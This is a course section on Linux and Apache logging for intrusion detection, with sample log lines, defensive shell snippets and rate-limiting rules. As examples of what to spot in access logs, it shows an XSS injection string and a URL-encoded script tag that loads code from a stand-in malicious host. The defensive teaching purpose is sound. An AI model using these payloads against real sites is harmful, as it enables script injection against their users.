This part discusses how we can notice that something is going on in the system we are administering. After that, we move on towards intrusion tolerant architectures.

Your system is the target

You can try, and then try some more, but it is impossible to protect your network against every kind of attack. It would be good to know when something fishy is happening, or, in the worst case where the system is already breached, to have data that can be used to identify the cause. How do you achieve this? One word: LOGS. They contain the digital trail of what happens in your system.

Purpose of logs

According to OWASP, a log entry always contains four basic types of information: when, where, who, and what, and security events should always be included. Logs, then, are files that contain information about all the activities that happen in the system. The timestamped entries can be considered a fingerprint of what happened, which can be used to reconstruct a breach: one should be able to figure out what happened and in what order. Mining logs is a vital method of forensic analysis. The logs have to be managed properly, in such a manner that an intruder is not able to modify them. Properly managed logs can also be used as evidence in prosecution.

In addition to the obvious reasons, such as identifying security incidents or assisting non-repudiation controls, logs are a vital source of information for establishing the baseline behaviour of the day-to-day business. With that baseline, it is easier to use techniques such as anomaly detection to be warned when something out of the ordinary is going on, for example when something is about to break.
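As a toy illustration of the idea (not a real detector), a shell sketch along these lines could flag a day whose authentication activity is far above a previously observed baseline; the baseline value and the log path here are assumptions:

#!/bin/sh
# Count today's entries in auth.log; the date format matches syslog timestamps
today=$(grep -c "$(date '+%b %e')" /var/log/auth.log)
baseline=120   # assumed average daily count from earlier observations
# Warn if today's activity is more than three times the baseline
if [ "$today" -gt $((baseline * 3)) ]; then
    echo "Unusual auth activity: $today events today (baseline $baseline)"
fi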

Managing Logs

It is not necessary to keep everything for every part of the system. Instead, one can categorize the parts of the system into groups based on how vital they are (the architecture analysis, which was discussed earlier, can be used as a guide for figuring out which parts are the vital ones). Based on those groups, one can then decide how much information is stored about the actions. This is a balancing act between storage and knowledge of what happened. If you store a few short messages, your log does not require much storage, but then again you do not have much knowledge of what actually happened. At the other end of the spectrum, if you store basically everything, you need lots of storage but you know exactly what happened.
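One practical knob for this trade-off is the syslog severity level. As a minimal sketch, assuming rsyslog and hypothetical destination file names, a vital subsystem could keep everything while a less important one keeps only errors:

# Verbose: keep everything the authentication subsystem reports
auth,authpriv.*    /var/log/auth.log
# Terse: keep only errors and worse from cron
cron.err           /var/log/cron-errors.log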

Moreover, there are other things, such as the law, that the log collector has to remember. Depending on what is logged from the machine, you might bump into a situation where you need to have a privacy policy for people to read, and take extra precautions with data integrity and storage (even storage times). For example, if you log the site's usernames or emails, you are actually gathering personal information, which makes the log a personal data register. Another example is any other data in the log about communications that can be associated with a certain user, thereby identifying who did what. As a reminder, soon we are going to have even stricter regulation, the General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679), on how we have to handle personal data.

Logging in Linux systems

Here we are going to give a very brief introduction to logging on Linux systems. For other *nixes and flavors of Linux there might be some differences, such as the filename auth.log vs. auth_log, but the basics remain the same. Why Linux? Well, according to W3Techs and Netcraft, Linux as the OS and Apache as the web server hold the largest market share among the options used for setting up a web server to serve clients.

Linux Log Files

A typical log directory on a Linux-based system contains many types of logs. First, there is auth.log, which contains authentication events, such as sudo invocations, remote logins, etc. Second, the daemon log, which records information about the running application daemons. Third, the kernel log and the kernel ring buffer, which are useful for kernel troubleshooting. Fourth, the debug log, which collects debug-level information if enabled. Fifth, the system log itself, which contains the greatest amount of data; it is usually the place to look if the other logs do not contain the data you are after. In addition to these there are the application logs, out of which we will briefly introduce the Apache logs.
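For orientation, on a Debian/Ubuntu-style layout (an assumption; names vary between distributions) these logs can be found and inspected roughly as follows:

# The files discussed above, on a typical Debian/Ubuntu system
ls -l /var/log/auth.log /var/log/daemon.log /var/log/kern.log /var/log/syslog
# The kernel ring buffer is read with dmesg
dmesg | tail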

As an example, below are a couple of lines from different logs. The first is an example of an auth log line and the second is an example of a system log line. They are similar in format: first the timestamp, then the hostname, then who reported the event, and finally what happened.

Jan 18 19:24:59 examplehost sudo: pam_unix(sudo:auth): authentication failure; logname= uid=1073634 euid=0 tty=/dev/pts/0 ruser=username rhost=  user=username
Jan 23 18:05:24 examplehost dnsmasq[1536]: using nameserver 8.8.8.8#53

Apache logs

Apache creates two logs under /var/log/apache2/ (the location may vary depending on the system): an error log and an access log. The error log contains diagnostic information and records of any errors encountered. The access log contains everything else. It is highly customizable, but a line can look something like the following.

127.0.0.1 - frank [10/Oct/2007:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326

The first item on the line is the host, followed by the identity reported by the client (here a dash, as it is not available) and the userid (usually the contents of the REMOTE_USER environment variable). After these come the timestamp, the request line used, the return code, and the size of the transferred object.
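This layout is Apache's Common Log Format; as a sketch, it corresponds to a LogFormat directive along these lines in the Apache configuration:

# %h host, %l client identity, %u userid, %t timestamp,
# %r request line, %>s final status code, %b response size in bytes
LogFormat "%h %l %u %t \"%r\" %>s %b" common
CustomLog /var/log/apache2/access.log common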

Remote logging

It is not wise to store the only copies of the logs on a machine that might be hacked. It is a good idea to set up a central logging server to collect all the logs (possibly from multiple machines). This way one has redundant copies of the logs in case they are lost or tampered with. A central server collecting remote logs is also a good place to run analytics and to identify and present security anomalies. With multiple machines sending their logs, one must be certain that their perception of time is the same, for example by synchronizing their clocks with NTP; otherwise, interleaving what happened where and when can be difficult. One can set up remote logging in such a way that it is secured by TLS and possibly send the logs over the public Internet, but it might be a better idea to send them to another machine via a dedicated control network not attached to the Internet. (Even then the transfer should be encrypted: a mere oversight later, when changing routes, could suddenly make the control network accessible from the Internet. This is also one of the reasons why even machines in the "inside" networks should have access control.)
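As a minimal sketch of the idea, assuming rsyslog on the client and a hypothetical collector named logserver.example.com, forwarding everything over TCP looks roughly like this (TLS would be configured on top of this in a real deployment):

# /etc/rsyslog.d/90-forward.conf on the client (file name is an assumption)
# A single @ would forward over UDP; @@ forwards over TCP to the central server
*.* @@logserver.example.com:514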

Analysing the log files

Logs can be quite huge, easily over a gigabyte. Remembering that one line is a single action that has happened and does not take that many bytes, gigabyte-sized files contain a great many events, and going through them is a massive task. You can manage the task with bash, grep, cat, cut, awk, less, etc., but purpose-built tools also exist.
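For instance, here is a quick sketch with standard tools that summarizes which processes have been writing to the system log (the field position assumes the syslog format shown earlier):

# Field 5 of a syslog line is the reporting process, e.g. dnsmasq[1536]:
awk '{print $5}' /var/log/syslog | sort | uniq -c | sort -rn | head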

What to look for in a log

One thing to watch for is error messages from device drivers for hardware you have not plugged in. If, for example, the parallel port driver starts sending error messages although no actual device is using it, the conclusion would be that something fishy is going on.

Successful user logins appear as Accepted password, Accepted publickey, or Session opened. These can be perfectly valid actions, but what if you know that none of your workers are abroad and the IP addresses attached to these messages are from a faraway place? Or what if you see thousands of failed attempts before them? And although everything is working correctly when you see failed user logins (authentication failure or failed password), you should have something to slow the attempts down, such as an iptables rule that drops too-frequent connections from the same IP, or a script such as authfail that bans the IP for some period of time.
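As a sketch of the iptables approach (the port and thresholds are assumptions to adjust for your environment), the recent module can drop a source that opens too many SSH connections in a short window:

# Record each new SSH connection per source address
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH
# Drop a source that has made more than 4 new connections within 60 seconds
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name SSH -j DROP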

Changes to user accounts are also a point of interest. Things such as user account additions, changes, or deletions and password changes are really interesting, along with failed su and sudo attempts (FAILED su).

Last but not least, when something starts producing failures, it is usually something that should be checked out. It could be a faulty device, a bug, or someone trying to figure out if there is a hole in the system.

So you have the logs for the web server and you are wondering what you should be looking for in them. Below are some points where you can start (the list is not complete, but it can be used as a starting point for spotting something going wrong).

For example, in the request line one could see something like the following, which could be part of an XSS attack.

’\"--></style></script><script>MALICIOUS CODE</script>

Or you could be seeing strings with many URL-encoded characters where you are not supposed to see them. For example, the following might be something you do not want to see.

%3cscript%20src=%22http%3a%2f%2fwww.malicious.com%2fcode.js%22%3e%3c%2fscript%3e
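URL-decoded, that string is simply an injected script tag pulling code from an external site:

<script src="http://www.malicious.com/code.js"></script>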

If you see an error code 404, it is actually a good thing, as the server just said "I did not find the file you asked for". But then again, if you start getting loads of 404 codes, it could mean that someone is searching for something that they should not be looking for. On the other hand, the success code 200 OK can be much more than an OK, especially when the 200 OK is the result of, for example, either of the previous request lines. 302 redirect messages can be a sign that something has happened that should not have happened.
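A quick sketch for getting an overview of the status codes (field 9 assumes the Common Log Format shown above):

# Count occurrences of each HTTP status code in the access log
awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort -rn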

File paths and extensions are also something one should look at. Executable files are something you might not want to see in the logs. Moreover, system paths such as /var/log or /etc/shadow are not a good thing to find in a web server's log on a Linux box. It is also wise to remove backup and old files (.bak, .old) from the production site, as they are a good source for looking up changes in the system, and they could reveal that the developer is lazy and makes mistakes.
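As a sketch, one could grep the access log for such requests (the pattern here is only a starting point, not a complete rule):

# Requests touching sensitive system paths or leftover backup files
grep -E '(/etc/(passwd|shadow)|/var/log|\.bak|\.old)' /var/log/apache2/access.log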

During this second part of the advanced topics course, we have taken steps towards understanding system and application logging and how it can be used for intrusion detection. We also briefly glanced at the future with machine learning. This can be considered intrusion detection; the next part will look into intrusion tolerant architectures.
